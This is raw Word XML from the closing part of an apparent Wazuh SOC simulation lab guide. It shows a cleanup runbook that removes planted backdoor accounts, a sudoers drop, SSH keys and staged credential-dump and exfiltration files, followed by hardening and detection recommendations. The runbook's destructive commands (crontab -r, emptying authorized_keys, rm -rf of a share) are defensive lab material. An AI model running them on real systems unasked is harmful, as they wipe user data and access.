        <w:t>Run this full cleanup sequence on the Ubuntu agent after documenting results. Verify each step outputs the expected confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16C1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A3A50"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="3585F9"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="3A3A50"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="3A3A50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C16C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Run on: AGENT_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16C3" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16C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1. Remove backdoor accounts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16C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userdel -r svcmonitor 2&gt;/dev/null &amp;&amp; echo 'svcmonitor removed'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16C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userdel -r labsmb 2&gt;/dev/null &amp;&amp; echo 'labsmb removed'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16C7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smbpasswd -x svcmonitor 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16C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smbpasswd -x labsmb 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16C9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16C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2. Remove sudoers drops</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16C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rm -f /etc/sudoers.d/svcmonitor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16CC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visudo -c &amp;&amp; echo 'Sudoers OK'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16CD" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16C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3. Clear crontab</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16C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crontab -r 2&gt;/dev/null &amp;&amp; echo 'Crontab cleared'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16D0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16D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4. Remove planted SSH key</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16D2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&gt; ~/.ssh/authorized_keys &amp;&amp; echo 'authorized_keys cleared'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16D3" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16D4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5. Remove staged files in /tmp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16D5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rm -f /tmp/.shadow_backup /tmp/.passwd_dump \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16D6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       /tmp/.svc_update.sh /tmp/.exfil_bundle.tar.gz</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16D7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16D8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6. Revert Samba config</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16D9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rm -rf /srv/labshare</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16DA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sed -i '/\[labshare\]/,/^$/d' /etc/samba/smb.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16DB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sudo systemctl restart smbd nmbd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16DC" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16DD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EC8A0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>## 7. Verify baseline restored</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16DE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grep -E 'svcmonitor|labsmb' /etc/passwd || echo 'Clean: no lab accounts'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16DF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ls /etc/sudoers.d/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16E0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crontab -l 2&gt;/dev/null || echo 'Clean: no crontab'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16E1" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="0017415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echo '=== Cleanup complete ==='</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C16E3" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256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256E" w14:paraId="5D2C1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3585F9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C16E4" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Confirm agent still healthy after cleanup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16E5" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sudo systemctl status wazuh-agent --no-pager | head -5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C16E7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16E8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>12. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16E9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>12.1 Security Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16EA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Enable SMB message signing: add 'server signing = mandatory' to /etc/samba/smb.conf — prevents NTLM hash abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16EB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Disable root SSH login: set PermitRootLogin no in /etc/ssh/sshd_config.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16EC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Deploy fail2ban or Wazuh Active Response to auto-block IPs triggering rule 100100.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16ED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Monitor /etc/sudoers.d in production — a drop file there is a classic persistence mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16EE" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C16EF" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>12.2 Wazuh Improvements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16F0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Enable Active Response on the Wazuh server to auto-block attacker IP after brute force threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16F1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Add a composite rule (level 15) that fires when 3+ lab_attack rules trigger within 5 minutes from the same IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16F2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Configure email or webhook alerting on level 12+ events in the lab_attack group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16F3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Build a custom Wazuh Dashboard panel showing only lab_attack rule group events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16F4" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C16F5" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>12.3 Next Lab Ideas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16F6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Phase 6: Active Response — auto-block the attacker IP after rule 100100 fires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16F7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Phase 7: VirusTotal / MISP integration — enrich alerts with threat intelligence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16F8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Phase 8: Cloud extension — monitor AWS CloudTrail or Azure Activity Log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16F9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>SOC Runbook — build a formal incident response runbook from this lab's alert chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16FA" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C16FB" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>13.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3256E" w14:paraId="5D2C16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FC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 Documentation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FD" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://documentation.wazuh.com/current/index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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6FF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MITRE ATT&amp;CK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0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://attack.mitre.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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2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 Ruleset (GitHub)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3" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://github.com/wazuh/wazuh-ruleset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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5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 Ambassador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6" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://wazuh.com/ambassador</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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8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Wazuh Community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9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://community.wazuh.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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B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Lab 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C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[Add your GitHub repository link here]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Blog / LinkedIn Post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C170F" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[Add your published post link here]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1711" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1712" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1713" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="600" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>wazuh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3585F9"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1714" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="3585F9"/>
        </w:rPr>
        <w:t>https://wazuh.com</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E3256E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C171B" w14:textId="77777777" w:rsidR="00174153" w:rsidRDefault="00174153">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5D2C171D" w14:textId="77777777" w:rsidR="00174153" w:rsidRDefault="00174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C1716" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:before="100"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t>Wazuh 4.14.5  ·  SOC Engineer Simulation Lab  ·  Lab Use Only</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="3585F9"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:tab/>
      <w:t>wazuh.com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C1717" w14:textId="77777777" w:rsidR="00174153" w:rsidRDefault="00174153">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5D2C1719" w14:textId="77777777" w:rsidR="00174153" w:rsidRDefault="00174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C1715" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="2" w:color="3585F9"/>
      </w:pBdr>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="111111"/>
      </w:rPr>
      <w:t xml:space="preserve">wazuh.  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
      </w:rPr>
      <w:t xml:space="preserve"> |  Wazuh SOC Engineer Simulation Lab  — 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5516F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0146C80"/>
    <w:lvl w:ilvl="0" w:tplc="C3D41E48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="03EA9EBA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="CAC21DC4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="39FE2E64">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2E748AB4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B3D0C2AC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B4E079B0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E0C80170">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8A8A6076">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7EF1427C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1F6CC6A"/>
    <w:lvl w:ilvl="0" w:tplc="AAA638B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7E8A0F92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B628CE52">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CE8A325C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7F0C7E72">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="42A4ED90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7242E12C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F80EE9B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="040A2EC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="666521687">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="835340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56E"/>
    <w:rsid w:val="00067CA9"/>
    <w:rsid w:val="000E505F"/>
    <w:rsid w:val="00145BA5"/>
    <w:rsid w:val="00174153"/>
    <w:rsid w:val="003749E0"/>
    <w:rsid w:val="00453B37"/>
    <w:rsid w:val="005D73B5"/>
    <w:rsid w:val="008971ED"/>
    <w:rsid w:val="008B7237"/>
    <w:rsid w:val="008C10AE"/>
    <w:rsid w:val="009E62B0"/>
    <w:rsid w:val="00A0141D"/>
    <w:rsid w:val="00A33931"/>
    <w:rsid w:val="00BB4E5B"/>
    <w:rsid w:val="00BE039C"/>
    <w:rsid w:val="00C769B6"/>
    <w:rsid w:val="00C929C5"/>
    <w:rsid w:val="00CD0EF3"/>
    <w:rsid w:val="00DE7297"/>
    <w:rsid w:val="00E3256E"/>
    <w:rsid w:val="00E8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y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1371"/>
  <w15:docId w15:val="{0E2974A7-FEA2-444C-BA30-57332F82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hy-AM" w:eastAsia="hy-A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3585F9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014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30</Pages>
  <Words>3381</Words>
  <Characters>19277</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>160</Lines>
  <Paragraphs>45</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22613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Aram Evinyan</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-07T19:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-07T19:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>